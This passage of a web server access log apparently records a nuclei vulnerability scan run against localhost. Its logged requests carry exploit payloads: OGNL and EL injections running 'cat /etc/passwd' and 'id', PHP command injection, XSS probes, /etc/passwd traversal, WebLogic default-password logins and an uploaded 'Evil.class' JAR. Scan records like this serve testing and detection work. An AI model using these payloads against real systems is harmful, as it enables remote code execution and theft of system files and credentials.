Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5ElYvRq9OFsG8N2oZTR0zOoe.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 